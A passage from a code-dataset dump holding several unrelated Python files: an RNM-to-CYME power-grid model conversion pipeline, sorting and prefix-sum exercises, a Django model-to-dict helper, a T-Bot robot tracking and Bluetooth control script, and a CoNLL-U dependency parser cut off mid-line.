'../stack_library'\nplacement_library_dir = '../placement_library'\n\ndef create_rnm_to_cyme_stack_pv(dataset_dir, region, pct_pv=15):\n '''Create the stack to convert RNM models in OpenDSS to CYME.'''\n\n pct_pv = float(pct_pv)\n stack = Stack(name='RNM to CYME Stack')\n\n #Parse load coordinates csv file\n stack.append(Layer(os.path.join(layer_library_dir,'csv_processing')))\n\n #Parse Capacitor coordinates csv file\n stack.append(Layer(os.path.join(layer_library_dir,'csv_processing')))\n\n #Read the OpenDSS input model\n stack.append(Layer(os.path.join(layer_library_dir,'from_opendss')))\n\n #Add regulators with setpoints\n stack.append(Layer(os.path.join(layer_library_dir,'add_rnm_regulators')))\n\n #Modify the model\n stack.append(Layer(os.path.join(layer_library_dir,'post-processing')))\n\n #Add the load coordinates with a model merge\n stack.append(Layer(os.path.join(layer_library_dir,'merging-layer')))\n\n #Add the capacitor coordinates with a model merge\n stack.append(Layer(os.path.join(layer_library_dir,'merging-layer')))\n\n #Set number of customers\n stack.append(Layer(os.path.join(layer_library_dir,'set_num_customers')))\n\n #Split the network into feeders\n stack.append(Layer(os.path.join(layer_library_dir,'network_split')))\n\n #Add intermediate node coordinates\n stack.append(Layer(os.path.join(layer_library_dir,'intermediate_node')))\n\n #Create placement for PV\n stack.append(Layer(os.path.join(layer_library_dir,'create_placement')))\n\n #Add PV\n stack.append(Layer(os.path.join(layer_library_dir,'add_pv')))\n\n #Find missing coordinates\n stack.append(Layer(os.path.join(layer_library_dir,'find_missing_coords')))\n\n #Adjust overlaid nodes\n stack.append(Layer(os.path.join(layer_library_dir,'move_overlayed_nodes')))\n\n #Add cyme substations\n stack.append(Layer(os.path.join(layer_library_dir,'add_cyme_substations')))\n\n #Add ltc control settings\n stack.append(Layer(os.path.join(layer_library_dir,'set_ltc_controls')))\n\n #Add fuse control settings\n stack.append(Layer(os.path.join(layer_library_dir,'set_fuse_controls')))\n\n #Add extra switches to long lines \n stack.append(Layer(os.path.join(layer_library_dir,'add_switches_to_long_lines')))\n\n #Write to CYME\n stack.append(Layer(os.path.join(layer_library_dir,'to_cyme')))\n\n #Copy Tag file over\n stack.append(Layer(os.path.join(layer_library_dir,'add_tags')))\n\n\n for layer in stack:\n layer.args.mode = ArgMode.USE\n layer.kwargs.mode = ArgMode.USE\n\n #Load coordinate layer\n load_coordinates = stack[0]\n load_coordinates.kwargs['input_filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Loads_IntermediateFormat.csv')\n load_coordinates.kwargs['output_filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Loads_IntermediateFormat2.csv')\n load_coordinates.kwargs['object_name'] = 'Load'\n\n #Capacitor coordinate layer\n capacitor_coordinates = stack[1]\n capacitor_coordinates.kwargs['input_filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Capacitors_IntermediateFormat.csv')\n capacitor_coordinates.kwargs['output_filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Capacitors_IntermediateFormat2.csv')\n capacitor_coordinates.kwargs['object_name'] = 'Capacitor'\n\n #Read OpenDSS layer\n from_opendss = stack[2]\n from_opendss.args[0] = os.path.join(region,'OpenDSS','Master.dss')\n from_opendss.args[1] = os.path.join(region,'OpenDSS','BusCoord.dss')\n from_opendss.kwargs['base_dir'] = dataset_dir\n\n #Set regulators with setpoints\n rnm_regulators = stack[3]\n 
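 #stack[3] is the 'add_rnm_regulators' layer appended above (4th append)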
rnm_regulators.kwargs['rnm_name'] = 'CRegulador'\n rnm_regulators.kwargs['setpoint'] = 103\n\n #Modify layer\n #No input except the model. Nothing to do here...\n post_processing = stack[4]\n post_processing.kwargs['path_to_feeder_file'] = os.path.join(dataset_dir,region,'Auxiliary','Feeder.txt')\n post_processing.kwargs['path_to_switching_devices_file'] = os.path.join(dataset_dir,region,'OpenDSS','SwitchingDevices.dss')\n post_processing.kwargs['center_tap_postprocess'] = True\n post_processing.kwargs['switch_to_recloser'] = True\n\n #Merging Load layer\n merging_load = stack[5]\n merging_load.kwargs['filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Loads_IntermediateFormat2.csv')\n\n #Merging Capacitor Layer\n merging_caps = stack[6]\n merging_caps.kwargs['filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Capacitors_IntermediateFormat2.csv')\n\n #Resetting customer number layer\n customer = stack[7]\n customer.kwargs['num_customers'] = 1\n\n #Splitting layer\n split = stack[8]\n split.kwargs['path_to_feeder_file'] = os.path.join(dataset_dir,region,'Auxiliary','Feeder.txt')\n split.kwargs['path_to_no_feeder_file'] = os.path.join(dataset_dir,region,'Auxiliary','NoFeeder.txt')\n split.kwargs['compute_metrics'] = True\n split.kwargs['compute_kva_density_with_transformers'] = True #RNM networks have LV information\n split.kwargs['excel_output'] = os.path.join('.', 'results', region, '{pct}_pv'.format(pct=pct_pv),'cyme', 'metrics.csv')\n split.kwargs['json_output'] = os.path.join('.', 'results', region, '{pct}_pv'.format(pct=pct_pv),'cyme', 'metrics.json')\n\n\n #Intermediate node layer\n inter = stack[9]\n inter.kwargs['filename'] = os.path.join(dataset_dir,region,'OpenDSS','LineCoord.txt')\n\n #Create Placement for PV\n feeders = 'all'\n equipment_type = 'ditto.models.load.Load'\n selection = ('Random',pct_pv)\n seed = 1\n placement_folder = os.path.join(placement_library_dir,region)\n file_name = feeders+'_'+equipment_type.split('.')[-1]+'_'+selection[0]+'-'+str(selection[1])+'_'+str(seed)+'.txt'\n\n\n create_placement = stack[10]\n create_placement.args[0] = feeders\n create_placement.args[1] = equipment_type\n create_placement.args[2] = selection\n create_placement.args[3] = seed\n create_placement.args[4] = placement_folder\n create_placement.args[5] = file_name\n\n add_pv = stack[11]\n add_pv.args[0] = os.path.join(placement_folder,file_name) # placement\n add_pv.args[1] = 4000 # rated power (Watts)\n add_pv.args[2] = 1.0 # power factor\n\n\n\n # Missing coords\n # No args/kwargs for this layer\n\n # Move overlayed node layer\n adjust = stack[13]\n adjust.kwargs['delta_x'] = 10\n adjust.kwargs['delta_y'] = 10\n\n #Substations\n\n add_substations = stack[14]\n readme_list = [os.path.join(dataset_dir,region,'Inputs',f) for f in os.listdir(os.path.join(dataset_dir,region,'Inputs')) if f.startswith('README')]\n readme = None\n if len(readme_list)==1:\n readme = readme_list[0]\n add_substations.args[0] = os.path.join(dataset_dir,region,'Auxiliary', 'Feeder.txt')\n add_substations.kwargs['base_dir'] = dataset_dir\n add_substations.kwargs['readme_file'] = readme\n\n \n #LTC Controls\n\n ltc_controls = stack[15]\n ltc_controls.kwargs['setpoint'] = 103\n\n #Fuse Controls\n\n fuse_controls = stack[16]\n fuse_controls.kwargs['current_rating'] = 100\n\n #Add switch in long lines\n\n switch_cut = stack[17]\n switch_cut.kwargs['cutoff_length'] = 800\n\n #Write to CYME\n final = stack[18]\n final.args[0] = 
os.path.join('.','results',region,'{pct}_pv'.format(pct=pct_pv),'cyme')\n\n #Write Tags\n tags = stack[19]\n tags.kwargs['output_folder'] = os.path.join('.','results',region,'{pct}_pv'.format(pct=pct_pv),'cyme')\n tags.kwargs['tag_file'] = os.path.join(dataset_dir,region,'Auxiliary','FeederStats.txt')\n\n stack.save(os.path.join(stack_library_dir,'rnm_to_cyme_stack_pv_'+region+'_'+str(pct_pv)+'_pct.json'))\n\n\ndef main():\n # Based on the structure in the dataset3 repo: https://github.com/Smart-DS/dataset3\n#create_rnm_to_cyme_stack(os.path.join '..','..','dataset3', 'MixedHumid'), 'industrial')\n region= sys.argv[1]\n dataset = sys.argv[2]\n percent = float(sys.argv[3])\n dataset_map = {'dataset_4':'20180920','dataset_3':'20181010','dataset_2':'20180716'}\n if not os.path.isdir(os.path.join('.','results',region,'{pct}_pv'.format(pct=percent),'cyme')):\n os.makedirs(os.path.join('.','results',region,'{pct}_pv'.format(pct=percent),'cyme'))\n create_rnm_to_cyme_stack_pv(os.path.join('..','..','{dset}_{date}'.format(dset=dataset,date = dataset_map[dataset])), region, percent)\n from layerstack.stack import Stack\n s = Stack.load('../stack_library/rnm_to_cyme_stack_pv_'+region+'_'+str(percent)+'_pct.json')\n s.run_dir = 'run_dir'\n s.run()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/create_rnm_to_cyme_stack_pv_pct.py","file_name":"create_rnm_to_cyme_stack_pv_pct.py","file_ext":"py","file_size_in_byte":9004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"71184360","text":"# -*- coding:utf-8 -*-\n# @author:Marx Yang\n# @file:test.py\n# @time:2017/7/28\n\nimport random\nimport math\nimport copy\nfrom sort.InSort import *\nfrom sort.InSort import merge_sort as ms\n\ndisorder0 = []\ndisorder1 = [1]\ndisorder2 = [9, 3]\ndisorder3 = [4, 5, 6]\ndisorder11 = [3, 65, 2, 1, 5, 32, 23, 128, 0, 6, 43]\ndisorderc = ['a', 'c', 'b', '1']\ndisorders = ['wq', 'aq']\ndisordery = [(1, 2), (0, 3)]\ndisorderlong = []\n# for i in range(0,10000):disorderlong.append(random.randint(0,100000))\nprint(ms(disorder0))\nprint(ms(disorder1))\nprint(ms(disorder2))\nprint(ms(disorder3))\nprint(ms(disorder11))\nprint(ms(disorderc))\nprint(ms(disorders))\nprint(ms(disordery))\n\norder = [1,2,3,4,5,6,7]\norder1 = order[:math.ceil(len(order)/2)]\norder2 = order[math.ceil(len(order)/2):]\nprint(order1)\nprint(order2)\n\nprint(ordered_sort([1, 2, 5, 7, 8, 12, 32, 34], [2, 5, 6, 7, 9, 10, 21, 31, 41]))\nssss = order[4:]\nssss = ssss + order[:1]\ni = 23\nprint(list(str(i)))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"555353662","text":"#Author: Daniel Reuter\r\n#Github: https://github.com/rojter-tech\r\n\r\ndef letter_presums(A):\r\n n = len(A)\r\n ASums = (n + 1)*[0]; CSums = (n + 1)*[0]\r\n GSums = (n + 1)*[0]; TSums = (n + 1)*[0]\r\n for k in range(0,n):\r\n if A[k] == \"A\":\r\n ASums[k + 1] = ASums[k] + 1\r\n else:\r\n ASums[k + 1] = ASums[k]\r\n if A[k] == \"C\":\r\n CSums[k + 1] = CSums[k] + 1\r\n else:\r\n CSums[k + 1] = CSums[k]\r\n if A[k] == \"G\":\r\n GSums[k + 1] = GSums[k] + 1\r\n else:\r\n GSums[k + 1] = GSums[k]\r\n if A[k] == \"T\":\r\n TSums[k + 1] = TSums[k] + 1\r\n else:\r\n TSums[k + 1] = TSums[k]\r\n \r\n return ASums, CSums, GSums, TSums\r\n\r\ndef slice_minimal(p, q, ASums, CSums, GSums, TSums):\r\n freq = ASums[q + 1] - ASums[p]\r\n if freq > 0:\r\n return 1\r\n freq = CSums[q + 1] - 
CSums[p]\r\n if freq > 0:\r\n return 2\r\n freq = GSums[q + 1] - GSums[p]\r\n if freq > 0:\r\n return 3\r\n freq = TSums[q + 1] - TSums[p]\r\n if freq > 0:\r\n return 4\r\n\r\ndef solution(S, P, Q):\r\n ASums, CSums, GSums, TSums = letter_presums(S)\r\n minimpactList = []\r\n for p, q in zip(P,Q):\r\n thismin = slice_minimal(p, q, ASums, CSums, GSums, TSums)\r\n minimpactList.append(thismin)\r\n \r\n return minimpactList\r\n\r\nS = \"CAGCCTA\" ; P = [2,5,0]; Q = [4,5,6]\r\n#S = \"T\" ; P = [0]; Q = [0]\r\n\r\nprint(solution(S,P,Q))","sub_path":"Python/Lesson05/Lesson[5-2]Five.py","file_name":"Lesson[5-2]Five.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"515483434","text":"def django_sub_dict(obj):\n #allowed_fields = obj._meta.fields # pick the list containing the requested fields\n sub_dict = {}\n for field in obj._meta.fields: # go through all the fields of the model (obj)\n if field.is_relation: # will result in true if it's a foreign key\n if getattr(obj, field.name):\n # call this function, with a new object, the model which is being referred to by the foreign key.\n sub_dict[field.name] = django_sub_dict(getattr(obj, field.name)) \n else: # not a foreign key? Just include the value (e.g., float, integer, string)\n sub_dict[field.name] = getattr(obj, field.name)\n \n return sub_dict\n","sub_path":"shop/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"407138167","text":"import sys\nimport cv2\nimport os\nimport imutils\nsys.path.append('/home/pi/GitHub/T-BOTS/Python')\nfrom collections import deque\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom TBotTools import tbt, pid, geometry\nfrom time import time\nplt.ion()\nimport bluetooth as bt\nx = []\ny = []\nx2 = []\ny2 = []\nstarttime = []\nendtime = []\nlaptime = 1000\noldlaptime = 500\n\nfolder = 'RecordedImages/'\nrecord = 0\n\n#folder = 'SpeedTest/'\nif record:\n if os.path.isdir(folder) is not True:\n os.mkdir(folder)\ntemplate = folder + '%05d.png'\nfont = cv2.FONT_HERSHEY_SIMPLEX \n\n#---------------- Setup text writing -----------------#\n# org \norg = (50, 50) \n# fontScale \nfontScale = 0.5 \n# Blue color in BGR \ncolor = (255, 0, 0)\ncolor2 = (255, 255, 255) \n# Line thickness of 2 px \nthickness = 1\ntextstr = ''\n\n\n\ntii = 0 # counter to prevent recording every frame and slowing the Pi\niii = 1\nloopcount = 0\npathindex = 0\ntimeflag = 0\npathindex = 0\nrotspeed = 200\nspeedfactor = 0.3\n\nturnspeedfactor = 0.3\nturntime = 0.005\nbendscalefactor = 10\nrdeadban = 2\ntolerance = 30\n\nfeedforward = 10\npos_pid = pid.pid(0.1,0.4,0,[-10,10],[0,40],turntime)\nangle_pid = pid.pid(0.4,2.40,0.01,[-15,15],[-60,60],turntime)\n#----------------------------------------------------------------------#\n# Set HSV Thresholds\n#\n# Artificial Lighting\n#----------------------------------------------------------------------#\n#greenLower = (36,42,228) \n#greenUpper = (74,255,255) \n \n#pinkLower = (143,70,113) \n#pinkUpper = (255,255,255) \n\n#----------------------------------------------------------------------#\n# Sunny\n#----------------------------------------------------------------------#\n\ngreenLower = (74,105,61)\t\ngreenUpper = (90,255,224)\n\npinkLower = (127,53,58) \npinkUpper = (255,255,255) 
\n\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Dull\n#----------------------------------------------------------------------#\n\n#greenLower = (41,43,213)\t\n#greenUpper = (66,255,224)\n\n#pinkLower = (140,77,98) \n#pinkUpper = (255,255,255) \n\n#----------------------------------------------------------------------#\n# sets the length of the trail\npts = deque(maxlen=10)\npts2 = deque(maxlen=10)\n\npathindex = 0\nrotspeed = 200\nspeedfactor = 0.3\nturnspeedfactor = 0.3\nturntime = 0.01\nbendscalefactor = 2\nrdeadban = 2\ntolerance = 30\n\n#-------------------- Define functions ------------------------------#\ngeom = geometry.geometry(1) # scale factor to convert pixels to mm\n\n#--------------------- Setup Bluetooth --------------------------------#\ndata = [0,0,0,0]\nsendcount = 0\n\n#------------------------------------------------------------------\n# For Linux / Raspberry Pi\n#------------------------------------------------------------------\nbd_addr = '98:D3:51:FD:81:AC' # use: 'hcitool scan' to scan for your T-Bot address\n#bd_addr = '98:D3:51:FD:82:95' # George\n#bd_addr = '98:D3:91:FD:46:C9' # B\n#bd_addr = '98:D3:32:21:3D:77'\nport = 1\nbtcom = tbt.bt_connect(bd_addr,port,'PyBluez') # PyBluez works well for the Raspberry Pi\n#btcom = tbt.bt_connect(bd_addr,port,'Socket')\n\n#----------------------------------------------------------------------#\n# For Windows and Mac\n#----------------------------------------------------------------------#\n#port = 'COM5'\n#port = '/dev/tty.George-DevB'\n#baudrate = 38400\n#bd_addr = 'Empty'\n#btcom = tbt.bt_connect(bd_addr,port,'PySerial',baudrate)\n#---------------------- Setup the Camera ----------------------------#\n\n\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_AUTOFOCUS, 0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 720)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 405)\n\n\nsuccess, frame = cap.read()\nif not success:\n print('Check camera connection')\n sys.exit(1)\n\ncap.release()\n\n#----------------- Generate target function -------------------------#\nsuccess, frame = cap.read()\namplitude = 80\nfrequency = 1.5\nphase = 0\nstepsize = 5\nborder = 80 # sets the number of pixels from the edge which wont be occupied by the function.\nbg = frame.shape[0]/2 # this is the background of the sin function\n\n#---------------- Create coordinates for path --------------------#\nxdata = np.arange(border, frame.shape[1]-border, stepsize)\naa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n#aa = np.loadtxt('pathpoints.dat') # Use Click2Path.py to create an arbitrary path\n#aa = geom.circlefunc([frame.shape[0]/2,frame.shape[1]/2],100,100)\n\n########################################################################\n#----------------------- Start main loop ----------------------------#\n########################################################################\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_AUTOFOCUS, 0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 720)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 405)\n#cap.set(0,1280)\n\noldtime = time()\nif __name__ == '__main__':\n \n success, frame = cap.read()\n if not success:\n print('Failed to capture video')\n sys.exit(1)\n\n #####################################################\n #----------------- Track T-Bot -------------------#\n #####################################################\n\n while cap.isOpened():\n success, frame = cap.read()\n if not success:\n break\n\n if 
~btcom.connected():\n\n tries = 0\n while btcom.connected() < 1 and tries < 10:\n print('Connecting ...')\n try:\n print('Try '+str(tries+1)+' of 10')\n btcom.connect(0)\n btcom.connect(1)\n tries+=1\n except:\n print('Something went wrong')\n \n if btcom.connected() < 1:\n print('Exiting Program')\n sys.exit()\n else:\n tries = 0\n data = btcom.get_data(data) \n\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV) # do this outside function so it is not done twice\n\n try: \n x, y, center, radius, M, cents = geom.tracker(hsv, greenLower, greenUpper)\n\n if radius > 1:\n cv2.circle(frame, (int(x), int(y)), int(radius),(0, 255, 0), 2)\n cv2.circle(frame, center, 2, (0, 255, 0), -1)\n pts.appendleft(center)\n except:\n\n pass\n \n try:\n x2, y2, center2, radius2, M2, cents2 = geom.tracker(hsv, pinkLower, pinkUpper)\n\n if radius2 > 1:\n cv2.circle(frame, (int(x2), int(y2)), int(radius2),(113,212,198), 2)\n cv2.circle(frame, center2, 2, (113,212,198), -1)\n pts2.appendleft(center2)\n \n except:\n \n pass\n\n #------------- Plot trail overlay -------------#\n\n for i in range(1, len(pts)):\n # if either of the tracked points are None, ignore\n if pts[i - 1] is None or pts[i] is None:\n continue\n \n cv2.line(frame, pts[i - 1], pts[i], (0, 255, 0), 1)\n\n for ii in range(1, len(pts2)):\n # if either of the tracked points are None, ignore\n if pts2[ii - 1] is None or pts2[ii] is None:\n continue\n \n cv2.line(frame, pts2[ii - 1], pts2[ii], (113,212,198), 1)\n\n \n cv2.polylines(frame, np.int32([aa]),True,(255,0,109),2)\n cv2.circle(frame, tuple(aa[pathindex,:].astype(int)), 8, (250,150,10), -1)\n\n if laptime < oldlaptime:\n if laptime < 1000:\n textstr = 'Best time is: '+\"{:6.4f}\".format(laptime)\n oldlaptime = laptime\n \n cv2.putText(frame, textstr, org, font,fontScale, color, thickness, cv2.LINE_AA)\n textstr2 = 'Last lap time: '+\"{:6.4f}\".format(laptime)\n cv2.putText(frame, textstr2, (org[0],org[1]+20), font,fontScale, color2, thickness, cv2.LINE_AA)\n\n cv2.imshow('MultiTracker', frame)\n\n\n ###################################################\n #--------------- Control Strategy ---------------#\n ###################################################\n \n if x != [] and x2 !=[]:\n vto = aa[pathindex] # target coordinate\n try:\n vto_next = aa[pathindex+3] # next target coordinate\n except:\n pass\n _distance = geom.distance((x,y),(x2,y2),vto) # distance to target coordinate\n\n if _distance < tolerance:\n pathindex += 1 # if close enough to target coordinate, get next coordinate\n vto = aa[pathindex]\n \n if timeflag == 0:\n starttime = time()\n timeflag = 1\n \n pos_pid.clear() \n angle_pid.clear()\n \n\n if pathindex == len(aa)-1:\n sendcount = btcom.send_data('200200Z',sendcount)\n print('Done, reached end of path...')\n #aa = np.flipud(aa)\n laptime = time()-starttime\n #feedforward += 1\n #print(feedforward)\n pathindex = 0\n timeflag = 0\n\n angle = geom.angle((x,y),(x2,y2),vto)\n #dt = time()-oldtime\n #rotspeed = 200+angle_pid.output(0,-angle,dt)\n rotspeed = 200+angle_pid.output(0,-angle)\n oldtime = time()\n #straightspeedfactor = 1-np.sin(abs(angle))\n straightspeedfactor = 1\n #forwardspeed = 200+straightspeedfactor*(pos_pid.output(0,-_distance,dt)+feedforward)\n forwardspeed = 200+straightspeedfactor*(pos_pid.output(0,-_distance)+feedforward)\n\n\n #------------ build data string ------------#\n\n rotspeed = '%03d' % rotspeed\n \n forwardspeed = '%03d' % forwardspeed\n\n print('forward speed '+forwardspeed+' turn speed 
'+rotspeed)\n #-------------- Send data ---------------#\n sendstr = str(rotspeed)+str(forwardspeed)+'Z'\n sendcount = btcom.send_data(sendstr,sendcount)\n\n \n\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"x\"):\n stepsize += 1\n xdata = np.arange(border, frame.shape[1]-border, stepsize)\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"z\"):\n \n if stepsize > 1:\n stepsize -= 1\n xdata = np.arange(border, frame.shape[1]-border, stepsize)\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n\n if key == ord(\"w\"):\n amplitude += 5\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"s\"):\n amplitude -= 5\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"t\"):\n buttonstring = '200200F' # Auto trim\n sendcount = btcom.send_data(buttonstring,sendcount)\n if key == ord(\"r\"):\n buttonstring = '200200E' # Auto trim\n sendcount = btcom.send_data(buttonstring,sendcount)\n if key == ord(\"y\"):\n buttonstring = '200200T' # Auto trim\n sendcount = btcom.send_data(buttonstring,sendcount)\n \n if key == ord(\"d\"):\n frequency += 0.5\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"a\"):\n frequency -= 0.5\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"g\"):\n speedfactor += 0.01\n print('speedfactor = '+str(speedfactor))\n if key == ord(\"f\"):\n feedforward -= 1\n print('speedfactor = '+str(speedfactor))\n if key == ord(\"g\"):\n feedforward += 1\n print('turnspeedfactor = '+str(turnspeedfactor))\n if key == ord(\"y\"):\n turnspeedfactor -= 0.01\n print('turnspeedfactor = '+str(turnspeedfactor))\n # if the 'q' key is pressed, stop the loop\n if key == ord(\"t\"):\n sendcount = btcom.send_data('200200T',sendcount)\n\n if key == ord(\"q\"):\n\n cap.release()\n sendcount = btcom.send_data('200200Z',sendcount)\n btcom.connect(0)\n break\n if record:\n if tii == 5:\n cv2.imwrite(template % iii, frame)\n iii += 1\n tii = 0\n else:\n tii += 1\n\n\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"Python/Development/T-Bot_Tracking/TBot_HSVTracking.py","file_name":"TBot_HSVTracking.py","file_ext":"py","file_size_in_byte":12788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"79465786","text":"# -*- coding:utf-8 -*-\n'''\nCreated on Feb 18, 2017\n\n@author: burak\n'''\n\nimport re\nimport logging\nimport networkx as nx\n\n\nLOG_LEVEL = logging.INFO\n\nclass CoNLL_UD():\n '''\n CoNLL Universal Dependencies\n '''\n\n def __init__(self, sentence, tag_simplify=1, log_level=LOG_LEVEL):\n '''\n Constructor\n '''\n self.sentence_conllu = sentence\n self.simple = tag_simplify\n\n self._tokenized_sent = []\n self._graph = None\n self._features = []\n self._supertags = []\n self.keys = ['ID', 'FORM', 'LEMMA', 'UPOSTAG', 'XPOSTAG', 'FEATS', 'HEAD', 'DEPREL', 'DEPS', 'MISC']\n \n self.logger = None\n self.init_logging(log_level)\n \n self.to_graph(self.sentence_conllu)\n self.to_features()\n self.to_supertags()\n \n \n @property\n def graph(self):\n return self._graph\n \n @property\n def features(self):\n return self._features\n \n @property\n def supertags(self):\n return self._supertags\n \n @property\n def sentence(self):\n return self._tokenized_sent\n \n @property\n def nodes(self):\n return sorted(self.graph.nodes(), key=lambda n: self.graph.node[n]['POSITION'])\n \n \n def height(self, tree, root):\n if tree.successors(root) != []:\n return max([self.height(tree, r) for r 
in tree.successors(root)]) + 1\n else:\n return 0\n \n \n def to_attr(self, line):\n '''\n '''\n values = [token.strip() for token in line.strip().split('\\t')]\n assert len(self.keys) == len(values), 'number of fields do not match'\n return {k:v for k,v in zip(self.keys, values)}\n \n \n def clear_tag(self, supertag):\n '''\n remove subcategories from supertags\n (S[dcl]\\\\NP)/(S[b]\\\\NP) -> (S\\\\NP)/(S\\\\NP) -> (S-NP)-(S-NP)\n ((S\\\\NP)\\(S\\\\NP))/N[num] -> ((S\\\\NP)\\\\(S\\\\NP))/N -> ((S-NP)-(S-NP))-N\n \n maybe also remove directions from slashes\n \n self.simple:\n 0: none\n 1: subcategories\n 2: directions\n 3: both subcategories and directions\n '''\n if self.simple % 2 == 1:\n supertag = re.sub('\\[[^\\]]*\\]', '', supertag)\n if self.simple // 2 == 1:\n supertag = re.sub(r'[\\\\/]', '-', supertag)\n return supertag\n \n \n def misc_attr(self, s):\n '''\n example MISC field:\n cat=((S[b]\\\\NP)/PP)/NP|args=2:1,11:3,12:2|preds=8:2,16:2\n {'CAT': '((S\\\\NP)/PP)/NP', # or '((S-NP)-PP)-NP'\n 'PREDS': [('8', '2'), ('16', '2')], \n 'ARGS': [('2', '1'), ('11', '3'), ('12', '2')]}\n \n consider misc data in the treebank\n consider misc data without =\n arabic\n consider multiple =\n catalan\n MWE=Embassaments=_Transvasaments\n '''\n d = {}\n self.logger.debug(s)\n if s != '_':\n #tmp = {k:v for t in s.split('|') for k,v in [t.split('=')]}\n misc = s.split('|')\n for tmp in misc:\n if 'cat=' in tmp:\n # d['CAT'] = tmp['cat']\n _, v = tmp.split('=')\n d['CAT'] = self.clear_tag(v)\n elif 'preds=' in tmp:\n _, v = tmp.split('=')\n d['PREDS'] = [(i,p) for t in v.split(',') for i,p in [t.split(':')]]\n elif 'args=' in tmp:\n _, v = tmp.split('=')\n d['ARGS'] = [(i,p) for t in v.split(',') for i,p in [t.split(':')]]\n elif '=' in tmp:\n kv = tmp.split('=')\n k, v = kv[0], '='.join(kv[1:])\n d[k] = v\n else:\n d['OTHER'] = tmp\n self.logger.debug(str(d))\n return d\n\n \n def to_graph(self, sentence):\n '''\n \n '''\n\n words = []\n comments = ''\n i = 0\n for line in sentence:\n # only before the sentence_conllu \n if line.strip()[0] == '#':\n comments += line\n # words, also adds empty nodes and multiword tokens\n else:\n w = self.to_attr(line)\n if '-' not in w['ID']:\n i += 1\n w['POSITION'] = i\n words.append(w)\n \n if words == []:\n self.logger.error('empty sentence_conllu')\n return\n \n # build graph if there are words \n graph = nx.MultiDiGraph(COMMENTS=comments, GROUPS=[], NUM_TOKENS=len(words)) \n \n # add nodes while checking multi-word tokens\n m_ids = []\n m_form = ''\n for w in words:\n if '-' in w['ID']:\n start, end = [int(i) for i in w['ID'].split('-')]\n m_ids = range(start, end+1)\n m_form = w['FORM']\n graph.graph['GROUPS'].append((str(start), str(end), m_form))\n self.logger.debug('multi ' + w['ID'] +' '+ str(start) +' '+ str(end) +' '+ m_form)\n else:\n self._tokenized_sent.append(w['FORM'])\n w2 = w\n w2.update(self.misc_attr(w['MISC']))\n if int(w['ID'].split('.')[0]) in m_ids:\n w2['MULTI-FORM'] = m_form\n w2['MULTI-IDS'] = '-'.join([str(m_ids[0]), str(m_ids[-1])])\n graph.add_node(w['ID'], attr_dict=w2)\n self.logger.debug('added ' + w2['ID'])\n self.logger.debug('node data: ' + str(w2))\n \n # add edges\n # multiple instances of ROOT in a single sentence_conllu is possible\n root_candidates=set([])\n for w in words:\n if w['HEAD'] == '_':\n continue\n if '-' not in w['ID']:\n if w['DEPREL'].lower() != 'root' :\n graph.add_edge(w['HEAD'], w['ID'], key='ud', attr_dict={'REL':w['DEPREL'], 'TYPE':'primary'})\n if 'DEPENDENTS' not in graph.node[w['HEAD']]:\n 
graph.node[w['HEAD']]['DEPENDENTS'] = []\n graph.node[w['HEAD']]['DEPENDENTS'].append(w['ID'])\n self.logger.debug('edge ' + w['HEAD'] +' '+ w['ID'] +' '+ w['DEPREL'])\n else:\n root_candidates.add(w['ID'])\n self.logger.debug('root ' + w['HEAD'] +' '+ w['ID'] +' '+ w['DEPREL'])\n \n # check for cycles, should be acyclic a this point\n if len(list(nx.simple_cycles(graph))) > 0:\n self.logger.error('cycle detected in sent')\n self.logger.error(list(nx.simple_cycles(graph)))\n return\n \n # choose a root based on height (only ud edges) \n root = max(root_candidates, key=lambda r:self.height(graph, r))\n \n # add other dependencies DEPS, PHEAD, PDEPREL\n for w in words:\n # ex: 2:nsubj|4:nsubj\n # multiple :\n # ex2: 8.1:nsubj:pass\n # 0 root may not be the primary\n # ex: 2.1 _ _ _ _ _ _ _ 0:exroot _\n if w['DEPS'] != '_':\n for d in w['DEPS'].split('|'):\n hr = d.split(':')\n h, r = hr[0], ':'.join(hr[1:])\n if h == '_':\n continue\n # root may not be the primary relation \n # in this case it won't be at the top of the tree\n # exroot -> dont care\n if r.lower() == 'root' :\n root_candidates.add(w['ID'])\n self.logger.debug('root2 ' + w['HEAD'] +' '+ w['ID'] +' '+ w['DEPREL'])\n # DEPREL has a duplicate here\n elif h != 